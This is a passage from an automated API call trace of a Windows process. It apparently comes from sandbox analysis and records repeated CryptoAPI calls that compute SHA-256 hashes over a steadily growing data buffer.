(hHash=0x2a5c40) returned 1 [0262.370] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.370] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.371] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.371] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x220, dwFlags=0x0) returned 1 [0262.371] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.371] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31bbe0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31bbe0, pdwDataLen=0x1ee448) returned 1 [0262.371] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.371] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.371] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.372] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.372] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x240, dwFlags=0x0) returned 1 [0262.372] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.372] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31bc10, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31bc10, pdwDataLen=0x1ee448) returned 1 [0262.372] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.372] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.372] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.373] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.373] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x260, dwFlags=0x0) returned 1 [0262.373] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.373] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31bc40, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31bc40, pdwDataLen=0x1ee448) returned 1 [0262.373] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.373] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.373] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.374] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.374] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x280, dwFlags=0x0) returned 1 [0262.374] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.374] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31bc70, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31bc70, pdwDataLen=0x1ee448) returned 1 [0262.374] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.374] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.374] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.374] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.374] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0262.374] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.374] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31bca0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31bca0, pdwDataLen=0x1ee448) returned 1 [0262.374] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.374] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.375] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.375] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.375] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0262.375] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.375] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31bcd0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31bcd0, pdwDataLen=0x1ee448) returned 1 [0262.375] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.375] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.375] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.376] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.376] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0262.376] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.376] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31bd00, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31bd00, pdwDataLen=0x1ee448) returned 1 [0262.376] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.376] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.376] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.377] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.377] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x300, dwFlags=0x0) returned 1 [0262.377] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.377] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31bd30, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31bd30, pdwDataLen=0x1ee448) returned 1 [0262.377] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.377] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.377] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.378] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.378] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x320, dwFlags=0x0) returned 1 [0262.378] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.378] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31bd60, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31bd60, pdwDataLen=0x1ee448) returned 1 [0262.378] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.378] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.378] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.378] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.378] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x340, dwFlags=0x0) returned 1 [0262.378] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.379] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31bd90, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31bd90, pdwDataLen=0x1ee448) returned 1 [0262.379] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.379] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.379] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.379] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.379] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x360, dwFlags=0x0) returned 1 [0262.379] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.379] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31bdc0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31bdc0, pdwDataLen=0x1ee448) returned 1 [0262.379] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.379] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.379] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.380] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.380] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x380, dwFlags=0x0) returned 1 [0262.380] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.380] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31bdf0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31bdf0, pdwDataLen=0x1ee448) returned 1 [0262.380] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.380] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.380] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.381] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.381] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0262.381] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.381] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31be20, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31be20, pdwDataLen=0x1ee448) returned 1 [0262.381] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.381] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.381] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.382] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.382] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0262.382] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.382] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31be50, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31be50, pdwDataLen=0x1ee448) returned 1 [0262.382] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.382] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.382] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.383] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.383] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0262.383] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.383] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31be80, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31be80, pdwDataLen=0x1ee448) returned 1 [0262.383] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.383] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.383] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.383] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.383] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x400, dwFlags=0x0) returned 1 [0262.383] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.384] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31beb0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31beb0, pdwDataLen=0x1ee448) returned 1 [0262.384] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.384] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.384] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.384] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.384] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x420, dwFlags=0x0) returned 1 [0262.384] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.384] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31bee0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31bee0, pdwDataLen=0x1ee448) returned 1 [0262.384] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.384] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.384] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.385] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.385] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x440, dwFlags=0x0) returned 1 [0262.385] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.385] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31bf10, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31bf10, pdwDataLen=0x1ee448) returned 1 [0262.385] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.385] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.385] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.386] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.386] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x460, dwFlags=0x0) returned 1 [0262.386] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.386] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31bf40, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31bf40, pdwDataLen=0x1ee448) returned 1 [0262.386] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.386] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.386] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.387] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.387] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x480, dwFlags=0x0) returned 1 [0262.387] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.387] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31bf70, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31bf70, pdwDataLen=0x1ee448) returned 1 [0262.387] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.387] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.387] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.388] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.388] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0262.388] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.388] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31bfa0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31bfa0, pdwDataLen=0x1ee448) returned 1 [0262.388] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.388] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.388] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.388] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.388] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0262.388] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.388] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31bfd0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31bfd0, pdwDataLen=0x1ee448) returned 1 [0262.389] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.389] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.389] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.389] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.389] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0262.389] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.389] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c000, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c000, pdwDataLen=0x1ee448) returned 1 [0262.389] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.389] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.389] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.390] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.390] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x500, dwFlags=0x0) returned 1 [0262.390] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.390] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c030, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c030, pdwDataLen=0x1ee448) returned 1 [0262.390] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.390] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.390] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.391] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.391] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x520, dwFlags=0x0) returned 1 [0262.391] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.391] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c060, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c060, pdwDataLen=0x1ee448) returned 1 [0262.391] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.391] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.391] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.392] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.392] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x540, dwFlags=0x0) returned 1 [0262.392] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.392] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c090, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c090, pdwDataLen=0x1ee448) returned 1 [0262.392] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.392] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.392] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.392] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.392] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x560, dwFlags=0x0) returned 1 [0262.393] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.393] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c0c0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c0c0, pdwDataLen=0x1ee448) returned 1 [0262.393] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.393] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.393] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 